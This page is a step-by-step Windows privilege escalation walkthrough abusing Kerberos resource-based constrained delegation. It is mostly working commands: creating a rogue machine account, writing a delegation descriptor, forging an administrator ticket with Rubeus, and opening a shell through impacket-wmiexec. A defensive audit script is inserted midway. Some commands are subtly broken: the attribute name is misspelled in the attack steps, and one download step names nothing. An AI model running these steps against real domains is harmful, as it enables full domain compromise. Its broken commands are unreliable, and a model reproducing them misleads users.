Windows PrivEsc with Kerberos

Last modified: 2023-10-22


Privilege Escalation

First, download the two PowerShell scripts, PowerView.ps1 and Powermad.ps1, to the local machine.


Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

1. Check User Permissions and Windows Version

Check if users are allowed to create a new computer object on the domain.

Get-DomainObject -Identity "dc=example,dc=com" | Select-Object ms-ds-machineaccountquota

# -------------------------
# Result (any value above 0 lets an ordinary domain user add computer objects)
ms-ds-machineaccountquota: 10

Also check that the domain controller runs at least Windows Server 2012. The OSVersion field is reported by PowerView's Get-DomainController:

Get-DomainController | Select-Object OSVersion

# -------------------------
# Result
OSVersion: Windows Server 2022 Standard

Additionally, check whether the target computer already has the msds-allowedtoactionbehalfofotheridentity attribute set (an empty value means no resource-based delegation is configured yet).

Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result (a byte array like the one below is a populated security descriptor)
name         msds-allowedtoactionbehalfofotheridentity
----         -----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103

Create a new raw security descriptor.

# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose
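From the defender's side, the same two settings can be audited across the whole domain. The following script is an added example, not part of the original notes: it reads ms-DS-MachineAccountQuota from the domain root and decodes every populated msds-allowedtoactionbehalfofotheridentity descriptor with the same RawSecurityDescriptor type the steps above use to build one. It assumes a domain-joined Windows host with the .NET DirectoryServices classes available and needs no PowerView.

```powershell
# Added audit script (not from the original page). Reports the two preconditions the
# walkthrough above relies on: a non-zero machine account quota, and every computer whose
# msDS-AllowedToActOnBehalfOfOtherIdentity is populated, with the trustees decoded.

function Get-MachineAccountQuota {
    # Domain name is taken from RootDSE, so nothing is hard-coded.
    $rootDse = [ADSI]"LDAP://RootDSE"
    $domain  = [ADSI]("LDAP://" + $rootDse.defaultNamingContext)
    [int]$domain.Properties['ms-DS-MachineAccountQuota'].Value
}

function Get-RbcdTrustees {
    # Returns one object per (computer, trustee) pair found in the domain.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter   = '(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.Add('name')
    [void]$searcher.PropertiesToLoad.Add('msds-allowedtoactonbehalfofotheridentity')

    foreach ($result in $searcher.FindAll()) {
        $name = $result.Properties['name'][0]
        [byte[]]$bytes = $result.Properties['msds-allowedtoactonbehalfofotheridentity'][0]
        # Same type the attack uses to build the descriptor, here used to read it back.
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
        foreach ($ace in $sd.DiscretionaryAcl) {
            $sid = $ace.SecurityIdentifier
            try   { $trustee = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $trustee = "<unresolved: $sid>" }   # deleted or foreign principal
            [pscustomobject]@{
                Computer   = $name
                AceType    = $ace.AceType
                AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
                Trustee    = $trustee
            }
        }
    }
}

$quota = Get-MachineAccountQuota
$colour = if ($quota -gt 0) { 'Yellow' } else { 'Green' }
Write-Host "ms-DS-MachineAccountQuota = $quota" -ForegroundColor $colour
Get-RbcdTrustees | Format-Table -AutoSize
```

A trustee that is a freshly created computer account, or one that resolves to nothing, is the pattern left behind by the steps above and is worth investigating.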

3. Impersonate to Get a Ticket

Download Rubeus.exe to the local machine.


Then upload it to the target machine and generate the RC4 hash of the new machine account's password.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

Now request a service ticket as the new machine account while impersonating the administrator (Rubeus performs S4U2self followed by S4U2proxy).

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname> /ptt

# --------------
# Result (copy the long base64-encoded ticket printed at the end)

Then write the base64 blob to a .kirbi file and download it.

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi

4. Make the Ticket Usable and Use It

Download “”.


Destroy any existing tickets on the local machine (for example with kdestroy), convert the .kirbi ticket to a ccache that Linux tools can use, then point KRB5CCNAME at the new ticket.

# <converter-script> is the kirbi-to-ccache converter downloaded above (name not given on this page)
python3 <converter-script>.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

The ticket can now be used to get a shell. Pass the host name rather than an IP address so that it matches the service principal in the ticket.

impacket-wmiexec -k -no-pass example.com/administrator@<hostname>